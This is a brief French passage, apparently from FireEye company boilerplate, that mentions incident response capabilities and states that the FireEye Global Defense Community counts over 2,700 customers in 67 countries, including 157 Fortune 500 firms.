moyens de réponse et de résolution des incidents de sécurité. La FireEye Global Defense Community
comprend plus de 2 700 clients dans 67 pays, dont 157 entreprises du Fortune 500.